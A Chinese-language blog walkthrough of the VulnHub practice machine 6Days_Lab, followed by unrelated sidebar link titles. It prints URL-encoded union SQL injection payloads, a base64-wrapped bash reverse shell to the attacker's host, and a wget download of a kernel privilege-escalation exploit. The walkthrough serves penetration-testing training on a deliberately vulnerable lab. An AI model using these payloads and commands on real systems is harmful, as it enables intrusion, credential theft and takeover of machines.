当前位置:网站首页>vulnhub靶机--6Day_Lab-v1.0.1
vulnhub靶机--6Day_Lab-v1.0.1
2022-08-11 05:32:00 【Tauil】
项目地址
https://download.vulnhub.com/6daylab/6Days_Lab-v1.0.1.ova
靶机渗透
主机发现
arp-scan -l
nmap IP -sS
确定目标主机IP及端口,浏览器登录访问,尝试输入特殊字符引发错误,发现对符合'
敏感,
该处可能存在SQL注入漏洞,返回原界面,查看网络数据包,发现有其他数据包请求
双击进入数据包,发现不论将src修改为何值都没有有效输出但是也没有错误显示或者拦截,打开burpsuite进行抓包,尝试重新发送,将src修改为index.php,回显了初始页面,说明该处存在目录路径漏洞
终端输入命令dirb http://192.168.70.130
,遍历网页目录结构
修改src内容,访问每一个文件,要在后面添加.php,在config.php中发现了数据库密码,然后还可以查看checkpromo.php,发现了SQL查询语句内容
config.php
checkpromo.php
修改src值,查看apache默认配置文件,发现网站端口是在8080,但是只接受本地连接,因为在80端口输入的信息都被IPS拦截,所以我们可以通过该出漏洞访问8080端口针对checkpromo.php的promocode值进行SQL注入
/etc/apache2/sites-available/default
根据checkpromo.php的SQL查询内容构造payload,分别为
联合查询数据库名称:http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520database()%252C2%2523
联合查询数据表名称:http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520group_concat(table_name)%252C2%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase()%2523
联合查询对应数据表行列:http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520group_concat(column_name)%252C2%2520from%2520information_schema.columns%2520where%2520table_schema%253Ddatabase()%2520and%2520table_name%253D%2527users%2527%2523
联合查询对应数据表行列内容:http://127.0.0.1:8080/checkpromo.php?promocode=1%2527union%2520select%2520group_concat(username%252Cpassword)%252C2%2520from%2520fancydb.users%2523
获得用户账号密码,andrea,SayNoToPentests,先前主机发现时靶机打开了23端口,所以我们使用ssh命令连接目标主机
但是没有回显内容,尝试进行反弹shell,在原终端输入nc -lvvp 4444
,直接使用bash连接不行,要进行base64编码
bash -i >& /dev/tcp/攻击机IP/4444 0>&1 <-----base64编码
bash -c '{echo,base64编码}|{base64,-d}|{bash,-i}' <------执行该命令
提权
这时候就能看到回显了,uname -a
查看内核版本,另起一个终端,根据内核版本搜索脚本searchsploit 3.13.0
,默认脚本位置为:/usr/share/exploitdb/exploits/+Path
为了让目标靶机下载该脚本,打开kali的apache服务,并且将该脚本复制到网站中让目标靶机可以下载
在靶机中输入wget http://攻击机IP/37292.c
,目标靶机成功下载,因为是C文件,需要先进行编译,然后运行编译文件即可
在/home文件夹可以看到flag,运行即可
边栏推荐
猜你喜欢
8-byte standard request parsing during USB enumeration
The official website of OpenMLDB is upgraded, and the mysterious contributor map will take you to advance quickly
unity小技巧
【LeetCode-75】 颜色分类
C语言-6月8日-求两个数的最小公倍数和最大公因数;判断一个数是否为完数,且打印出它的因子
软件使用代码签名证书的好处和必要性
Asis2016 books null off by one
C# async/await异步操作实例
C# 基础之字典——Dictionary(一)
C语言-6月12日-字符替换问题,将一个‘ ’替换为2个‘#’
随机推荐
详解程序执行过程
Unity 使用双缓冲实现一个好用的计时器
C语言-7月21日-指针的深入
lua-table引用传递和值传递
程序集与反射技术(C#)
js learning advanced (event senior pink teacher teaching notes)
【LeetCode-162】寻找峰值
父子节点数据格式不一致的树状列表实现
2022年全国职业技能大赛网络安全竞赛试题B模块自己解析思路(5)
实操指南:多个域名该买哪种SSL证书?
欧拉角、四元数与旋转
【LeetCode-49】字母异位词分组
OpenGL 摄像机(Camera)类的创建
Unity的程序集Assembly 与 加快代码编译速度
【无标题】
IP证书申请
Lua中and和or的用法和记忆方法
【剑指offer系列】面试题日记(前期题)
不同类型SSL证书怎么选?
将一个excel文件中多个sheet页“拆分“成多个“独立“excel文件